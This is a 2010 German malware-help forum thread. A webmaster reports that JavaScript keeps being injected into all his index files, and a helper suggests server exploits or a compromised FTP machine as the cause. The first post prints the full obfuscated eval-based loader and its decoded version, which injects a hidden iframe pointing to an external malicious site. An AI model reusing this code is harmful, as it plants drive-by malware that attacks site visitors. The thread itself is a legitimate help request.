Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Unbekannter Virus verseucht alle index.html/php Dateien auf dem Server!

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 18.12.2010, 20:36   #1
Unwissender4
 
Unbekannter Virus verseucht alle index.html/php Dateien auf dem Server! - Ausrufezeichen

Unbekannter Virus verseucht alle index.html/php Dateien auf dem Server!



Hallo Community,
derzeit setzt mich ein nervenaufreibendes Problem unter Druck.

Meine gesamten index.html und index.php Dateien auf meinem Webspace sind mit unbekannten Javascripts verseucht.
Dies hat zur Folge, das man aufgefordert wird ein Plugin für den Standard Media Player zu installieren.

Ich habe die Dateien bereits manuell heute morgen wieder repariert, sprich den Code entfernt und neu hochgeladen.
Ein wenig später tritt genau das gleiche Problem auf.
Hier der Schädlingscode vor dem schließenden </body> Tag:
Code:
ATTFilter
<!-- ad --><script>var af="4.5*2,4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,20.5*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,62.5*2,16*2,50.5*2,54*2,57.5*2,50.5*2,16*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,59*2,48.5*2,57*2,16*2,49*2,50*2,60.5*2,16*2,30.5*2,16*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,49.5*2,57*2,50.5*2,48.5*2,58*2,50.5*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,20*2,17*2,49*2,55.5*2,50*2,60.5*2,17*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,4.5*2,58*2,57*2,60.5*2,16*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,48.5*2,56*2,56*2,50.5*2,55*2,50*2,33.5*2,52*2,52.5*2,54*2,50*2,20*2,49*2,50*2,60.5*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,4.5*2,62.5*2,16*2,49.5*2,48.5*2,58*2,49.5*2,52*2,16*2,20*2,50.5*2,20.5*2,16*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,49*2,55.5*2,50*2,60.5*2,16*2,30.5*2,16*2,49*2,50*2,60.5*2,29.5*2,6.5*2,4.5*2,4.5*2,4.5*2,62.5*2,6.5*2,4.5*2,4.5*2,4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,20.5*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,4.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,4.5*2,62.5*2,16*2,50.5*2,54*2,57.5*2,50.5*2,16*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,59.5*2,57*2,52.5*2,58*2,50.5*2,20*2,17*2,30*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,16*2,57.5*2,57*2,49.5*2,30.5*2,19.5*2,52*2,58*2,58*2,56*2,29*2,23.5*2,23.5*2,51.5*2,50.5*2,55.5*2,56*2,55.5*2,61*2,52.5*2,58*2,52.5*2,59*2,23*2,49.5*2,55.5*2,54.5*2,23.5*2,54.5*2,50.5*2,54*2,54*2,23.5*2,49.5*2,58*2,53*2,55*2,49*2,58*2,52.5*2,23*2,56*2,52*2,56*2,19.5*2,16*2,59.5*2,52.5*2,50*2,58*2,52*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,52*2,50.5*2,52.5*2,51.5*2,52*2,58*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,57.5*2,58*2,60.5*2,54*2,50.5*2,30.5*2,19.5*2,59*2,52.5*2,57.5*2,52.5*2,49*2,52.5*2,54*2,52.5*2,58*2,60.5*2,29*2,16*2,52*2,52.5*2,50*2,50*2,50.5*2,55*2,29.5*2,19.5*2,31*2,30*2,23.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,31*2,17*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,4.5*2,62.5*2,6.5*2,4.5*2,4.5*2,62.5*2,6.5*2,4.5*2,4.5*2,51*2,58.5*2,55*2,49.5*2,58*2,52.5*2,55.5*2,55*2,16*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,23*2,52.5*2,55*2,55*2,50.5*2,57*2,36*2,42*2,38.5*2,38*2,16*2,21.5*2,30.5*2,16*2,17*2,30*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,16*2,57.5*2,57*2,49.5*2,30.5*2,19.5*2,52*2,58*2,58*2,56*2,29*2,23.5*2,23.5*2,51.5*2,50.5*2,55.5*2,56*2,55.5*2,61*2,52.5*2,58*2,52.5*2,59*2,23*2,49.5*2,55.5*2,54.5*2,23.5*2,54.5*2,50.5*2,54*2,54*2,23.5*2,49.5*2,58*2,53*2,55*2,49*2,58*2,52.5*2,23*2,56*2,52*2,56*2,19.5*2,16*2,59.5*2,52.5*2,50*2,58*2,52*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,52*2,50.5*2,52.5*2,51.5*2,52*2,58*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,57.5*2,58*2,60.5*2,54*2,50.5*2,30.5*2,19.5*2,59*2,52.5*2,57.5*2,52.5*2,49*2,52.5*2,54*2,52.5*2,58*2,60.5*2,29*2,16*2,52*2,52.5*2,50*2,50*2,50.5*2,55*2,29.5*2,19.5*2,31*2,30*2,23.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,31*2,17*2,29.5*2,6.5*2,4.5*2,4.5*2,62.5*2".split(",");qtr=new Date(2010,11,5);var xvj="";var hspd="e"+(parseInt(qtr.getMonth())-1)+"a"+xvj+"l";mdco=(function(){return this;})();biwp=mdco[hspd.replace("10","v")];bqp=window['String'].fromCharCode;var wc='';for(var i=0;i<af.length;i++){wc+=bqp(biwp(af[i]));}
biwp(wc);</script><!-- /ad -->
         
Decodiert:
Code:
ATTFilter
if (document.getElementsByTagName('body')[0]){
   iframer();
  } else {
   var bdy = document.createElement("body");
   try {
    document.appendChild(bdy);
   } catch (e) {
    document.body = bdy;
   }
   if (document.getElementsByTagName('body')[0]){
    iframer();
   } else {
    document.write("<iframe src='hxxp://geopozitiv.com/mell/ctjnbti.php' width='10' height='10' style='visibility: hidden;'></iframe>");
   }
  }
  function iframer(){
   document.getElementsByTagName('body')[0].innerHTML += "<iframe src='hxxp://geopozitiv.com/mell/ctjnbti.php' width='10' height='10' style='visibility: hidden;'></iframe>";
  }
         
Danke für alle Tipps und Hinweise.

mfg,
unwissender4

Geändert von Unwissender4 (18.12.2010 um 20:50 Uhr)

Alt 18.12.2010, 21:02   #2
BataAlexander
> MalwareDB
 
Unbekannter Virus verseucht alle index.html/php Dateien auf dem Server! - Standard

Unbekannter Virus verseucht alle index.html/php Dateien auf dem Server!



Editier mal den Post von Dir und entfern die links bitte.

Schick mir doch mal ne PN mit Deiner Webseite.
__________________

__________________

Alt 18.12.2010, 21:50   #3
Unwissender4
 
Unbekannter Virus verseucht alle index.html/php Dateien auf dem Server! - Standard

Unbekannter Virus verseucht alle index.html/php Dateien auf dem Server!



Zitat:
Zitat von BataAlexander Beitrag anzeigen
Editier mal den Post von Dir und entfern die links bitte.

Schick mir doch mal ne PN mit Deiner Webseite.
Ich kann den Beitrag seit der Verschiebung nicht mehr editieren, tut mir Leid.
PN mit Link ist raus, die index Datei wurde aber wieder von mir bereinigt.

Ich habe auch aus Sicherheitsgründen das FTP-Programm gewechselt, sowie die FTP-Accounts gelöscht.

mfg
__________________

Alt 18.12.2010, 22:30   #4
BataAlexander
> MalwareDB
 
Unbekannter Virus verseucht alle index.html/php Dateien auf dem Server! - Standard

Unbekannter Virus verseucht alle index.html/php Dateien auf dem Server!



Auf der Seite selber kann ich erst mal nichts feststellen.
Es kann imho liegen an
- schlecht konfigurierter Web Server, Schwachstellen werden aktiv ausgenutzt.
Mal im Benutzermenü Deines Providers versuchen herauszufinden, auf was der Server läuft, sind da noch andere Oberflächen installiert? Jommala oder Typo Exploids erlauben in einigen Fällen vollen Root Zugriff.
- Jemand hat Zugriff auf Deinen Rechner. In Dem Fall mal das System scannen wie von Larusso und der Load.exe beschrieben und die Ergebnisse posten.
__________________
If every computer is running a diverse ecosystem, crackers will have
no choice but to resort to small-scale, targetted attacks, and the
days of mass-market malware will be over
[...].
Stuart Udall

Alt 19.12.2010, 13:11   #5
Unwissender4
 
Unbekannter Virus verseucht alle index.html/php Dateien auf dem Server! - Standard

Unbekannter Virus verseucht alle index.html/php Dateien auf dem Server!



Zitat:
Zitat von BataAlexander Beitrag anzeigen
Auf der Seite selber kann ich erst mal nichts feststellen.
Es kann imho liegen an
- schlecht konfigurierter Web Server, Schwachstellen werden aktiv ausgenutzt.
Mal im Benutzermenü Deines Providers versuchen herauszufinden, auf was der Server läuft, sind da noch andere Oberflächen installiert? Jommala oder Typo Exploids erlauben in einigen Fällen vollen Root Zugriff.
- Jemand hat Zugriff auf Deinen Rechner. In Dem Fall mal das System scannen wie von Larusso und der Load.exe beschrieben und die Ergebnisse posten.
Momentan taucht das Problem nicht mehr auf, seitdem ich meine FTP-Kontos gelöscht und mit einem neuen Passwort wieder erstellt habe.
Zudem benutze ich auch keine veralteten CM-Systeme, sondern selbst entwickelte Frontends.

Meine index Dateien habe ich manuell wieder auf Vordermann gebracht, den Hoster bereits informiert.
Normalerweise tritt das Problem sonst eigentlich immer nach 1-2 Stunden wieder auf, scheint also gelöst zu sein.
Ansonsten werde ich mich nochmal zu Wort melden.

Ich bedanke für deine Bemühungen, und wünsche dir noch ein frohes Weihnachtsfest

mfg


Antwort

Themen zu Unbekannter Virus verseucht alle index.html/php Dateien auf dem Server!
code, dateien, entfernt, folge, heute, index.php, media, media player, morgen, neu, player, plugin, problem, server, setzt, standard, this, tipps, unbekannte, unbekannten, unbekannter, unbekannter virus, verseucht, virus, virus verseucht, webspace



Ähnliche Themen: Unbekannter Virus verseucht alle index.html/php Dateien auf dem Server!


  1. ROTO Virus verschlüsselt alle Dateien
    Plagegeister aller Art und deren Bekämpfung - 30.06.2015 (3)
  2. Google + FB öffnen nicht über Firefox. Neuer Tab Meldung chrome://quick_start/content/index.html
    Plagegeister aller Art und deren Bekämpfung - 20.11.2014 (9)
  3. chrome://quick_start/content/index.html in Firefox-Tab
    Log-Analyse und Auswertung - 02.10.2014 (6)
  4. chrome://quick_start/content/index.html
    Plagegeister aller Art und deren Bekämpfung - 04.09.2014 (2)
  5. chrome://quick_start/content/index.html entfernen?
    Plagegeister aller Art und deren Bekämpfung - 30.08.2014 (17)
  6. chrome://quick_start/content/index.html in Firefox-Tab
    Log-Analyse und Auswertung - 18.07.2014 (15)
  7. Windows Vista / Firefox / chrome://quick_start/content/index.html
    Log-Analyse und Auswertung - 14.07.2014 (15)
  8. Trojaner chrome://quick_start/content/index.html -
    Log-Analyse und Auswertung - 03.06.2014 (1)
  9. chrome://quick_start/content/index.html entfernen?
    Plagegeister aller Art und deren Bekämpfung - 19.05.2014 (9)
  10. 50 €-Virus, sind eigene Dateien verseucht?
    Plagegeister aller Art und deren Bekämpfung - 05.03.2012 (1)
  11. iframe Virus schreibt sich in index.html Seiten
    Plagegeister aller Art und deren Bekämpfung - 09.08.2007 (2)
  12. iframe Virus schreibt sich in index.html Seiten
    Plagegeister aller Art und deren Bekämpfung - 05.05.2007 (12)
  13. Trojaner ? res://msaps.dll/index.html
    Log-Analyse und Auswertung - 13.01.2005 (11)
  14. HILFE: Wer kennt res://C:\WINNT\vxkpk.dll/index.html#96676
    Log-Analyse und Auswertung - 13.08.2004 (14)
  15. res://rewmu.dll/index.html#37794
    Plagegeister aller Art und deren Bekämpfung - 27.07.2004 (5)
  16. Hilfe: res://lyzcp.dll/index.html#37049
    Log-Analyse und Auswertung - 15.07.2004 (1)
  17. res://mshp.dll/index.html
    Plagegeister aller Art und deren Bekämpfung - 28.05.2004 (1)

Zum Thema Unbekannter Virus verseucht alle index.html/php Dateien auf dem Server! - Hallo Community, derzeit setzt mich ein nervenaufreibendes Problem unter Druck. Meine gesamten index.html und index.php Dateien auf meinem Webspace sind mit unbekannten Javascripts verseucht. Dies hat zur Folge, das man - Unbekannter Virus verseucht alle index.html/php Dateien auf dem Server!...
Archiv
Du betrachtest: Unbekannter Virus verseucht alle index.html/php Dateien auf dem Server! auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.